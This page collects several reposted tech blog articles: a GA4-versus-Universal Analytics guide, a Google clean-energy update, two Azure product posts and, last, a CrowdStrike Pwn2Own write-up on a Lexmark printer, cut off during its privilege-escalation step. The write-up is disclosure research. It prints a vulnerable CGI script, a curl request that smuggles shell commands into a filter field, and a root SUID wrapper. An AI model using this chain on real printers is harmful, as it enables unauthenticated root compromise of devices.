Google Analytics 4 vs Universal Analytics: Full Comparison 2022

Do you want to know what’s new in Google Analytics 4? How is GA4 different from Universal Analytics?

There’s a lot that’s changed in the new Google Analytics 4 platform, including the navigation. Google has added new features and removed a number of reports you’re familiar with. And that means we’ll need to relearn the platform.

In this guide, we’ll detail the differences between Google Analytics 4 (GA4) vs. Universal Analytics (UA) so that you’re prepared to make the switch.

If you haven’t already switched to Google Analytics 4, we have an easy step-by-step guide you can follow: How to Set Up Google Analytics 4 in WordPress.

What’s New Only in Google Analytics 4?

In this section, we’re detailing the things that are new in GA4 that aren’t present in Universal Analytics at all. A little later, we’ll go into depth about all the changes you need to know about.

  1. Creating and Editing Events: GA4 brings about a revolutionary change in the way you track events. You can create a custom event and modify events right inside your GA4 property. This isn’t possible with Universal Analytics unless you write code to create a custom event.
  2. Conversion Events: Conversion goals are being replaced with conversion events. You can simply mark or unmark an event to start tracking it as a conversion. There’s an easy toggle switch to do this. GA4 even lets you create conversion events ahead of time before the event takes place.
  3. Data Streams: UA lets you connect your website’s URL to a view. These views let you filter data. So for instance, you can create a filter in a UA view to exclude certain IP addresses from reports. GA4 uses data streams instead of views.
  4. Data filters: Now you can add data filters to include or exclude internal and developer traffic from your GA4 reports.
  5. Google Analytics Intelligence: You can delete search queries from your Analytics Intelligence search history to fine-tune its recommendations.
  6. Explorations and Templates: There’s a new Explore item in the menu that takes you to the Explorations page and Template gallery. Explorations give you a deeper understanding of your data. And there are report templates that you can use.
  7. Debug View: There’s a built-in visual debugging tool which is awesome news for developers and business owners. With this mode, you can get a real-time view of events displayed on a vertical timeline graph. You can see events for the past 30 minutes as well as the past 60 seconds.
  8. BigQuery linking: You can now link your GA4 property with your BigQuery account. This will let you run business intelligence tasks on your analytics data using BigQuery tools (a query sketch follows this list).
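To illustrate the BigQuery link, here's a minimal sketch of querying the export with the bq command-line tool. It assumes the export is already flowing; the project name and the property ID in the dataset name (the export uses the convention analytics_<property_id>) are placeholders:

# Count events per event name across June 2022 export tables.
bq query --use_legacy_sql=false '
  SELECT event_name, COUNT(*) AS event_count
  FROM `my-project.analytics_123456789.events_*`
  WHERE _TABLE_SUFFIX BETWEEN "20220601" AND "20220630"
  GROUP BY event_name
  ORDER BY event_count DESC'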

While this is what’s unique to GA4, there are a lot more changes than this. But first, let’s take a look at what’s gone from the Universal Analytics platform that we’re all familiar with.

What’s Missing in Google Analytics 4?

Google Analytics 4 has done away with some of the old concepts. These include:

  1. Views and Filters: As we mentioned, GA4 now uses Data Streams, which we explain in depth a bit later. So you won’t be able to create a view and related filters. Once you convert your UA property to GA4, you’ll be able to access a read-only list of UA filters under Admin » Account » All Filters.
  2. Customization (menu): UA properties have a customization menu for options to create dashboards, create custom reports, save existing reports, and create custom alerts. Below are the UA customization options, along with their GA4 equivalent.
    • Dashboards: At the time of writing this, there isn’t a way to create a custom GA4 dashboard.
    • Custom reports: GA4 has the Explorations page instead where you can create custom reports.
    • Saved reports: When you create a report in Explorations, it is automatically saved for you.
    • Custom alerts: Inside custom Insights, which is a new feature in GA4, you can set custom alerts.
  3. Google Search Console linking: There isn’t a way to link Google Search Console with a GA4 property at the time of writing.
  4. Bounce rate: One of the most tracked metrics – the bounce rate – is gone. It’s likely that this has been replaced with Engagement Metrics.
  5. Conversion Goals: In UA, you could create conversion goals under Views. But since views are gone, so are conversion goals. However, you can create conversion events to essentially track the same thing.

Now that you know what’s new and what’s missing in GA4, we’ll take you through an in-depth tour of the new GA4 platform.

Google Analytics 4 vs Universal Analytics

Below, we’ll be covering the main differences between GA4 and UA, one section at a time.

New Mobile Analytics

A major difference between GA4 and UA is that the new GA4 platform will also support mobile app analytics.

In fact, it was originally called “Mobile + Web”.

UA only tracked web analytics, so it was difficult for businesses with apps to get an accurate picture of their performance and digital marketing efforts.

Now, with the GA4 data model, you’ll be able to track both your website and your app: you can set up separate data streams for the web, Android, and iOS.


There’s also added functionality to create custom campaigns to collect information about which mediums/referrals are sending you the most traffic. This will show you where your campaigns get the most traction so that you can optimize your strategies in the future.

Easy User ID Tracking

Turning on user ID tracking in UA was quite a task. But that’s all been simplified in GA4 with the new measurement model. You simply need to navigate to Admin » Property Settings » Reporting Identity tab.


You can choose between Blended and Observed mode. Select the one you want and save your changes. That’s it.

In GA4, the reporting interface and the left-hand navigation menu will feel familiar, but quite a few menu items have changed.

First, there are only 4 high-level menu items right now. Google may add more as the platform is further developed.


Next, each menu item has a collapsed view. You can expand each item by clicking on it.

Clicking a submenu item expands it further to reveal additional submenus.


In GA4, you’ll see familiar menu items you use for SEO and other purposes but in different locations. Here are the notable changes:

  • Realtime is under Reports
  • Audience(s) is under Configure
  • Acquisition is under Reports » Life cycle
  • Conversions is under Configure

GA4 also comes with completely new menu items as listed below:

  • Reports snapshot
  • Engagement
  • Monetization
  • Retention
  • Library
  • Custom definitions
  • DebugView

Measurement ID vs Tracking ID

Universal Analytics uses a Tracking ID made up of the capital letters UA, a hyphen, a seven-digit account number, another hyphen, and a property number. Like this: UA-1234567-1.

The last number is a sequential number starting from 1 that maps to a specific property in your Google Analytics account. So if you set up a second Google Analytics property, the new code will change to UA-1234567-2.

You can find the Tracking ID for a Universal Analytics property under Admin » Property column. Navigate to Property Settings » Tracking ID tab where you can see your UA tracking ID.

In GA4, you’ll see a Measurement ID instead of a Tracking ID. It starts with a capital G, followed by a hyphen and a 10-character alphanumeric code.


It would look like this: G-SV0GT32HNZ.

To find your GA4 Measurement ID, go to Admin » Property » Data Streams. Click on a data stream. You’ll see your Measurement ID in the stream details after the Stream URL and Stream Name.

Data Streams vs Views

In UA, you could connect your website’s URL to a view. UA views are mostly used to filter data. So for instance, you can create a filter in a UA view to exclude certain IP addresses from reports.

GA4 uses data streams instead. You’ll need to connect your website’s URL to a data stream.

But don’t be mistaken, they are not the same as views.

Also, you can’t create view filters in GA4 (only the data filters for internal and developer traffic mentioned earlier). If your property was converted from UA to GA4, you can find a read-only list of UA filters under Admin » Account » All Filters.


Now Google defines a data stream as:

“A flow of data from your website or app to Analytics. There are 3 types of data stream: Web (for websites), iOS (for iOS apps), and Android (for Android apps).”

You can use your data stream to find your Measurement ID and global site tag code snippet. You can also enable enhanced measurement events such as page views, scrolls, and outbound clicks.


In a data stream, you can do the following:

  • Set up a list of domains for cross-domain tracking
  • Create a set of rules for identifying internal traffic
  • Put together a list of domains to exclude from tracking

Data streams will make a lot of things easier. But there are two things you need to be aware of. First, once you create a data stream, there’s no way to edit it. Second, if you delete a data stream, you can’t undo the action.
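Data streams can also be inspected programmatically. As a sketch (assuming the v1beta Google Analytics Admin API and credentials that carry the analytics.readonly scope; the property ID is a placeholder), you can list a property's data streams like this:

# List all data streams configured on a GA4 property.
curl -s \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://analyticsadmin.googleapis.com/v1beta/properties/123456789/dataStreams"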

Events vs. Hit Types

UA tracks data by hit types; a hit is essentially an interaction that results in data being sent to Analytics. Hit types include page hits, event hits, eCommerce hits, and social interaction hits.

GA4 moves away from the concept of hit types. Instead, it’s event-based, meaning every interaction is captured as an event: page views, events, eCommerce transactions, social interactions, and app screen views are all recorded as events.

There’s also no option for creating conversion goals. But GA4 lets you flag or mark an event as a conversion with the flip of a toggle switch.


This is essentially the same thing as creating a conversion goal in Universal Analytics. You can also create new conversion events ahead of time before those events actually take place.

In GA4, Google organizes events into 4 categories and recommends that you use them in this order:

1. Automatically collected

In the first event category, there are no settings to turn on, so you don’t need to activate anything here. Google will automatically collect data on these events:

  • first_visit – the first visit to a website or Android instant app
  • session_start – the time when a visitor opens a web page or app
  • user_engagement – when a session lasts longer than 10 seconds, includes one or more conversion events, or includes two or more page views

Keep in mind that we’re only at the start of GA4. With Google’s ever-advancing machine learning technology, more automatically collected events may be added as the platform progresses.

2. Enhanced measurement

In this section, you don’t need to write any code but there are settings to turn on enhanced measurements. This will give you an extra set of automatically collected events.

To enable this data collection, you need to turn on the Enhanced measurement setting in your Data Stream.


Then you’ll see more enhanced measurement events that include:

  • page_view: a page-load in the browser or a browser history state change
  • click: a click on an outbound link that goes to an external site
  • file_download: a click that triggers a file download
  • scroll: the first time a visitor scrolls to the bottom of a page

3. Recommended

These GA4 events are recommended but aren’t automatically collected in GA4 so you’ll need to enable them if you want to track them.

We suggest you check out what is in the recommended events and turn on tracking for what you need. This can include signups, logins, and purchases.

Before we move on to custom events: if the event you want to track isn’t covered by these three types – automatically collected, enhanced measurement, and recommended – you should create a custom event for it.

4. Custom

Custom events let you set up tracking for any event that doesn’t fall into the above 3 categories. You can create and modify your events. So for instance, you can create custom events to track menu clicks.

You can design and write custom code to enable tracking for the event you want. But there is no guarantee that Google will support your custom metrics and events.
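As an example of that custom code, events can also be sent server-side through the GA4 Measurement Protocol. The sketch below assumes a placeholder Measurement ID, an API secret created under the data stream's Measurement Protocol settings, and a hypothetical menu_click event:

# Send a custom menu_click event to GA4 from the command line.
curl -s -X POST \
  "https://www.google-analytics.com/mp/collect?measurement_id=G-XXXXXXXXXX&api_secret=YOUR_API_SECRET" \
  -H "Content-Type: application/json" \
  -d '{"client_id": "555.1656000000", "events": [{"name": "menu_click", "params": {"menu_item": "pricing"}}]}'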

No Bounce Rate

The bounce rate metric has vanished! It’s been suggested that Google wants to focus on users that stay on your website rather than the ones that leave.

So this has likely been replaced with engagement rate metrics to collect more data on user interactions and engaged sessions.

No Custom Reports

UA properties have a customization menu for options to create dashboards, create custom reports, save existing reports, and create custom alerts.

A lot of this has changed in GA4. To make it easier to follow, here are the UA features and their GA4 equivalents:

  • Custom reports can be found in the Explorations page.
  • Saved reports are automatically created when you run an Exploration.
  • Custom alerts can be set up inside custom Insights from the GA4 home page.

One more thing to note is that you also won’t find a way to link Google Search Console with a GA4 property (at the time of writing). And that’s all the key differences between Universal Analytics and Google Analytics 4.

Now you may be wondering whether you HAVE TO make the switch to GA4. A lot of our users have been asking us this question so we’ll tell you quickly what you need to do.

Do I Have To Switch to GA4?

Google will retire Universal Analytics in July 2023. You’ll have access to your UA data for some time, but all new data will flow into GA4. If you have a UA property set up, you’ll see this warning in your dashboard:


So you have to set up a GA4 property sooner or later and we recommend that you do it sooner. This is because your UA data won’t be transferred to GA4. You have to start afresh.

You can set up your GA4 property now and let it collect data. In the meantime, you can continue to use Universal Analytics and use the time to learn the new GA4 platform. Then when we’re all forced to make the switch, you’ll have plenty of historical data in your GA4 property.

If you haven’t set up your Google Analytics 4 property yet, we’ve compiled an easy step-by-step guide for you: How to Set Up Google Analytics 4 in WordPress.

Want to skip the guide and use a tool? Then MonsterInsights is the best way to set up GA4. It even lets you create dual tracking profiles so you can have both UA and GA4 running simultaneously.


After setting up GA4, you can go deeper into your data with our follow-up guides, which will help you track your users and their activity on your site so that you can get more valuable insights and analytics data to improve your site’s performance.

Source :
https://www.isitwp.com/google-analytics-4-vs-universal-analytics/

Five years of 100% renewable energy – and a look ahead to a 24/7 carbon-free future

Google operates the cleanest cloud in the industry, and we have long been a leading champion of clean energy around the world. Since we began purchasing renewable energy in 2010, Google has been responsible for more than 60 new clean energy projects with a combined capacity of over 7 gigawatts — about the same as 20 million solar panels. Our long-term support for clean energy projects has contributed to the rapid growth of the industry, remarkable declines in the cost of solar and wind power, and innovative new contracting models and industry partnerships to accelerate corporate clean energy procurement.


In 2021, we were the only major cloud provider to match 100% of the electricity consumption of our operations with renewable energy purchases – a goal we’ve accomplished for the past five years. This establishes Google Cloud as the cleanest cloud in the industry, and is particularly exciting given the rapid expansion of computing conducted in our data centers over the same period. This required significantly ramping up our global renewable energy purchasing: in 2021 alone we signed agreements to buy power from new renewable energy projects with a combined capacity of nearly 1300 MW – expanding our global portfolio by almost 25%.

A new frontier: 24/7 Carbon-Free Energy

Matching our annual energy consumption with renewable energy purchases has been an important step in our sustainability journey, but there are still regions and times of day where clean energy is unavailable and we are forced to rely on fossil fuels to meet our electricity needs. That is why we are now working towards our moonshot goal of operating on 24/7 carbon-free energy (CFE) by 2030, the last step in our journey to fully decarbonize Google’s global operations.

https://youtube.com/watch?v=YhSSW9LAUyw

Operating on 24/7 CFE is a far more complex and technically challenging goal than matching our annual global energy use with renewable energy purchases. It means matching our electricity demand with carbon-free energy supply every hour of every day, in every region where we operate. No company has achieved this before, and there is no playbook for achieving this.

In the spirit of transparency, today we are releasing the 2021 carbon-free energy percentages (CFE%) for each of Google’s data centers. Globally, Google operated at 66% CFE in 2021 – 5% higher than 2019, but 1% lower than 2020. We expected this kind of short-term fluctuation: building new clean energy is a multi-year process, and our near-term priority is to build strong foundations for long-term CFE growth.


Our largest percentage increases were at our data centers in Chile, at 4%, and Ohio and Virginia, at 4%. In other regions, we encountered significant new headwinds, including a lack of available renewable energy supply and delays to CFE construction due to supply chain disruptions and interconnection challenges. Notably, we also saw flat or declining CFE percentages on the majority of the grids where we operate, underscoring the need for more ambitious action to accelerate grid-level decarbonization everywhere. This is an enormous challenge that requires holistic and long-term solutions, and we are working with our partners across government, industry, and civil society to build a global movement to drive progress at the speed and scale required.

As we work to operate on 24/7 carbon-free energy by 2030, we remain confident in our long-term trajectory and are increasing our focus on regions and times of day where carbon-free energy is not readily available due to resource constraints, policy barriers, or market obstacles. We are building solutions to fill these gaps, including: 

  • New approaches to buying diverse portfolios of carbon-free energy
  • Projects to advance next-generation technologies like geothermal and batteries
  • A first-of-its-kind carbon-intelligent computing platform to maximize the reduction in grid-level CO2 emissions
  • Advanced methods for tracking clean energy and maximizing the economic value of clean energy projects
  • Expanded efforts to advocate for public policies that accelerate grid-level decarbonization 

Getting to 24/7 CFE won’t be easy, but we’re optimistic for the future. Our CFE goal is part of our third decade of climate action and company goal of reaching net-zero emissions across our operations and value chain, including our consumer hardware products, by 2030. We aim to reduce the majority of our emissions (versus our 2019 baseline) before 2030, and plan to invest in carbon removal solutions to neutralize our remaining emissions. 

We will continue to share our progress and lessons as we work towards our goal, and to work with our partners to accelerate the global transition to a prosperous, carbon-free future.

Source :
https://cloud.google.com/blog/topics/sustainability/5-years-of-100-percent-renewable-energy

Azure powers rapid deployment of private 4G and 5G networks

As the cloud continues to expand into a ubiquitous and highly distributed fabric, a new breed of application is emerging: Modern Connected Applications. We define these new offerings as network-intelligent applications at the edge, powered by 5G, and enabled by programmable interfaces that give developer access to network resources. Along with internet of things (IoT) and real-time AI, 5G is enabling this new app paradigm, unlocking new services and business models for enterprises, while accelerating their network and IT transformation.

At Mobile World Congress this year, Microsoft announced a significant step towards helping enterprises in this journey: Azure Private 5G Core, available as a part of the Azure private multi-access edge compute (MEC) solution. Azure Private 5G Core enables operators and system integrators (SIs) to provide a simple, scalable, and secure deployment of private 4G and 5G networks on small footprint infrastructure, at the enterprise edge.

This blog dives a little deeper into the fundamentals of the service and highlights some extensions that enterprises can leverage to gain more visibility and control over their private network. It also includes a use case of an early deployment of Azure Kubernetes Services (AKS) on an edge platform, leveraged by the Azure Private 5G Core to rapidly deploy such networks.

Building simple, scalable, and secure private networks

Azure Private 5G Core dramatically simplifies the deployment and operation of private networks. With just a few clicks, organizations can deploy a customized set of selectable 5G core functions, radio access network (RAN), and applications on a small edge-compute platform, at thousands of locations. Built-in automation delivers security patches, assures compliance, and performs audits and reporting. Enterprises benefit from a consistent management experience and improved service assurance experience, with all logs and metrics from cloud to edge available for viewing within Azure dashboards.

Enterprises need the highest level of security to connect their mission critical operations. Azure Private 5G Core makes this possible by natively integrating into a broad range of Azure capabilities. With Azure Arc, we provide seamless and secure connectivity from an on-premises edge platform into the Azure cloud. With Azure role-based access control (RBAC), administrators can author policies and define privileges that will allow an application to access all necessary resources. Likewise, users can be given appropriate access to manage all resources in a resource group, such as virtual machines, websites, and subnets. Our Zero Trust security frameworks are integrated from devices to the cloud to keep users and data secure. And our complete, “full-stack” solution (hardware, host and guest operating system, hypervisor, AKS, packet core, IoT Edge Runtime for applications, and more) meets standard Azure privacy and compliance benchmarks in the cloud and on the enterprise edge, meaning that data privacy requirements are adhered to in each geographic region.
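To illustrate the RBAC model mentioned above, here's a minimal Azure CLI sketch (the identity and resource group names are placeholders) that scopes an application identity's privileges to a single resource group:

# Grant an application identity Contributor rights on one resource group.
az role assignment create \
    --assignee <app-or-identity-object-id> \
    --role "Contributor" \
    --resource-group my-edge-rg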

Deploying private 5G networks in minutes

Microsoft partner Inventec is a leading design manufacturer of enterprise-class technology solutions like laptops, servers, and wireless communication products. The company has been quick to see the potential benefit in transforming its own world-class manufacturing sites into 5G smart factories to fully utilize the power of AI and IoT.

In a compelling example of rapid private 5G network deployment, Inventec recently installed our Azure private MEC solution in their Taiwan smart factory. It took only 56 minutes to fully deploy the Azure Private 5G Core and connect it to 5G access points that served multiple 5G endpoints—a significant reduction from the months that enterprises have come to expect. Azure Private 5G Core leverages Azure Arc and Azure Kubernetes Service on-prem to provide security and manageability for the entire core network stack. Figures 1 and 2 below show snapshots from the trial.


Figure 1: Screenshot of logs with time stamps showing start and completion of the core network deployment.


Figure 2: Screenshot from the trial showing one access point successfully connected to seven endpoints.

Inventec is developing applications for manufacturing use-cases that leverage private 5G networks and Microsoft’s Azure Private 5G Core. Examples of these high-value MEC use cases include Automatic Optical Inspection (AOI), facial recognition, and security surveillance systems.

Extending enterprise control and visibility from the 5G core

Through close integration with other elements of the Azure private MEC solution, our Azure Private 5G Core essentially acts as an enterprise “control point” for private wireless networks. Through comprehensive APIs, the Azure Private 5G Core can extend visibility into the performance of connected network elements, simplify the provisioning of subscriber identity modules (SIMs) for end devices, secure private wireless deployments, and offer 5G connectivity between cloud services (like IoT Hub) and associated on-premises devices.


Figure 3: Azure Private 5G Core is a central control point for private wireless networks.

Customers, developers, and partners are finding value today with a number of early integrations with both Azure and third-party services that include:

  • Plug and play RAN: Azure private MEC offers a choice of 4G or 5G Standalone radio access network (RAN) partners that integrate directly with the Azure Private 5G Core. By integrating RAN monitoring with the Azure Private 5G Core, RAN performance can be made visible through the Azure management portal. Our RAN partners are also onboarding their Element Management System (EMS) and Service Management and Orchestrator (SMO) products to Azure, simplifying deployment processes and providing a framework for closed-loop radio performance automation.
  • Azure Arc managed edge: The Azure Private 5G Core takes advantage of the security and reliability capabilities of Azure Arc-enabled Azure Kubernetes Service running on Azure Stack Edge Pro. These include policy definitions with Azure Policy for Kubernetes, simplified access to AKS clusters for high availability with Cluster Connect, and fine-grained identity and access management with Azure RBAC. (A connection sketch follows this list.)
  • Device and Profile Management: Azure Private 5G Core APIs integrate with SIM management services to securely provision the 5G devices with appropriate profiles. In addition, integration with Azure IoT Hub enables unified management of all connected IoT devices across an enterprise and provides a message hub for IoT telemetry data. 
  • Localized ISV MEC applications: Low-latency MEC applications benefit from running side-by-side with core network functions on the common (Azure private MEC) edge-compute platform. By integrating tightly with the Azure Private 5G Core using Azure Resource Manager APIs, third-party applications can configure network resources and devices. Applications offered by partners are available in, and deployable from, the Azure Marketplace.
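To give a flavor of the Azure Arc integration mentioned in the list above, the following sketch (cluster and resource group names are placeholders) connects an existing on-premises Kubernetes cluster to Azure Arc using the connectedk8s CLI extension:

# Onboard an on-premises cluster so Azure can manage it like any resource.
az extension add --name connectedk8s
az connectedk8s connect \
    --name factory-edge-cluster --resource-group my-edge-rg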

It’s easy to get started with Azure private MEC

As innovative use cases for private wireless networks continue to develop and Industry 4.0 transformation accelerates, we welcome ISVs, platform partners, operators, and SIs to learn more about Azure private MEC.

  • Application ISVs interested in deploying their industry or horizontal solutions on Azure should begin by onboarding their applications to Azure Marketplace.
  • Platform partners, operators, and SIs interested in partnering with Microsoft to deploy or integrate with private MEC can get started by reaching out to the Azure private MEC Team.

Microsoft is committed to helping organizations innovate from the cloud, to the edge, and to space—offering the platform and ecosystem strong enough to support the vision and vast potential of 5G. As the cloud continues to expand and a new breed of modern connected apps at the edge emerges, the growth and transformation opportunities for enterprises will be profound. Learn more about how Microsoft is helping developers embrace 5G.

Source :
https://azure.microsoft.com/en-us/blog/azure-powers-rapid-deployment-of-private-4g-and-5g-networks/

Simplify and centralize network security management with Azure Firewall Manager

We are excited to share that Azure Web Application Firewall (WAF) policy and Azure DDoS Protection plan management in Microsoft Azure Firewall Manager is now generally available.

With an increasing need to secure cloud deployments through a Zero Trust approach, the ability to manage network security policies and resources in one central place is a key security measure.

You can now centrally manage Azure Web Application Firewall (WAF) policies to provide Layer 7 application security to your application delivery platforms, Azure Front Door and Azure Application Gateway, in your networks and across subscriptions. You can also configure DDoS Protection Standard to protect your virtual networks from Layer 3 and Layer 4 attacks.

Azure Firewall Manager is a central network security policy and route management service that allows administrators and organizations to protect their networks and cloud platforms at scale, all in one central place.

Azure Web Application Firewall is a cloud-native web application firewall (WAF) service that provides powerful protection for web apps from common hacking techniques such as SQL injection and security vulnerabilities such as cross-site scripting.

Azure DDoS Protection Standard provides enhanced Distributed Denial-of-Service (DDoS) mitigation features to defend against DDoS attacks. It is automatically tuned to protect all public IP addresses in virtual networks. Protection is simple to enable on any new or existing virtual network and does not require any application or resource changes. 

Utilizing both WAF policies and DDoS protection in your network provides multi-layered protection across all your essential workloads and applications.

WAF policy and DDoS Protection plan management are an addition to Azure Firewall management in Azure Firewall Manager.

Centrally protect your application delivery platforms using WAF policies 

In Azure Firewall Manager, you can now manage and protect your Azure Front Door or Application Gateway deployments by associating WAF policies, at scale. This allows you to view all your key deployments in one central place, alongside Azure Firewall deployments and DDoS Protection plans.

Figure 1: Associating a WAF policy to an Azure Front Door
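While the association itself is performed in the Firewall Manager portal, the underlying WAF policy can also be created from the Azure CLI. A sketch, assuming the front-door extension is installed and using placeholder names:

# Create a Front Door WAF policy in prevention mode.
az extension add --name front-door
az network front-door waf-policy create \
    --name MyFrontDoorWafPolicy --resource-group my-rg --mode Prevention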

Upgrade from WAF configuration to WAF policy

In addition, the platform lets administrators upgrade from a WAF configuration to a WAF policy for Application Gateway by selecting the service and choosing Upgrade from WAF configuration. This allows for a more seamless migration to WAF policies, which support WAF policy settings, managed rulesets, exclusions, and disabled rule groups.

As a note, everything that could previously be configured through a WAF configuration in Application Gateway can be done through a WAF policy.

Figure 2: Upgrading a WAF configuration to a WAF policy
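As a CLI-level sketch of the same idea (names and IDs are placeholders; the attachment uses the generic --set update, on the assumption that the gateway's firewallPolicy property holds the policy's resource ID):

# Create a standalone WAF policy for Application Gateway.
az network application-gateway waf-policy create \
    --name AgwWafPolicy --resource-group my-rg

# Attach it to an existing gateway by resource ID.
az network application-gateway update \
    --name my-agw --resource-group my-rg \
    --set firewallPolicy.id=/subscriptions/<sub-id>/resourceGroups/my-rg/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/AgwWafPolicy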

Manage DDoS Protection plans for your virtual networks

You can enable a DDoS Protection Standard plan on your virtual networks listed in Azure Firewall Manager, across subscriptions and regions. This allows you to see which virtual networks have Azure Firewall and/or DDoS protection in a single place.

 Figure 3: Enabling DDoS Protection Standard on a virtual network in Azure Firewall Manager
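The portal flow above also has a CLI equivalent. As a sketch with placeholder names, you can create a protection plan and link it to a virtual network:

# Create a DDoS protection plan and enable it on a virtual network.
az network ddos-protection create \
    --name MyDdosPlan --resource-group my-rg
az network vnet update \
    --name my-vnet --resource-group my-rg \
    --ddos-protection-plan MyDdosPlan --ddos-protection true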

View and create WAF policies and DDoS Protection Plans in Azure Firewall Manager

You can view and create WAF policies and DDoS Protection Plans from the Azure Firewall Manager experience, alongside Azure Firewall policies.

In addition, you can import existing WAF policies to create a new WAF policy, so you do not need to start from scratch if you want to maintain similar settings.

Figure 4: View of Web Application Firewall Policies in Azure Firewall Manager
Figure 5: View of DDoS Protection Plans in Azure Firewall Manager

Monitor your overall network security posture

Azure Firewall Manager provides monitoring of your overall network security posture. Here, you can easily see which virtual networks and virtual hubs are protected by Azure Firewall, a third-party security provider, or DDoS Protection Standard. This overview can help you identify and prioritize any security gaps that are in your Azure environment, across subscriptions or for the whole tenant.

Figure 6: Monitoring page in Azure Firewall Manager

Coming soon, you’ll also be able to view your Application Gateway and Azure Front Door monitors, for a full network security overview.

Learn more

To learn more about these features in Azure Firewall Manager, visit the Manage Web Application Firewall policies tutorial, WAF on Application Gateway documentation, and WAF on Azure Front Door documentation. For DDoS information, visit the Configure Azure DDoS Protection Plan using Azure Firewall Manager tutorial and Azure DDoS Protection documentation.

To learn more about Azure Firewall Manager, please visit the Azure Firewall Manager home page.

Source :
https://azure.microsoft.com/en-us/blog/simplify-and-centralize-network-security-management-with-azure-firewall-manager/

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

Product: Lexmark MC3224
Affected Firmware Versions (without claim for completeness): CXLBL.075.272 (2021-07-29), CXLBL.075.281 (2021-10-14)
Fixed Firmware Version: CXLBL.076.294 (CVE-2021-44735). Note: Users must implement a workaround to address CVE-2021-44736; see the Lexmark Security Alert.
CVEs: CVE-2021-44735 (Shell Command Injection), CVE-2021-44736 (Authentication Reset)
Root Causes: Authentication Bypass, Shell Command Injection, Insecure SUID Binary
Impact: Unauthenticated Remote Code Execution (RCE) as root
Researchers: Hanno Heinrichs, Lukas Kupczyk
Lexmark Resources:
https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf
https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a vast number of actions through the web interface. One of these is Sanitize all information on nonvolatile memory. It can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interface, dest, path, and filter are extracted and populated from that data by using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the -F flag in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.
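To make the injection concrete, the request below sketches how such a payload could be delivered; the interface name and injected command are purely illustrative:

# The quoted -F value closes the filter argument early, so the shell
# commands after the embedded quote are executed by the eval statement.
curl -k --data '-i eth0 -f /usr/bin -F "x"; id; echo ""' \
    https://target/cgi-bin/sniffcapture_post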

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
    perror("setuid");
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

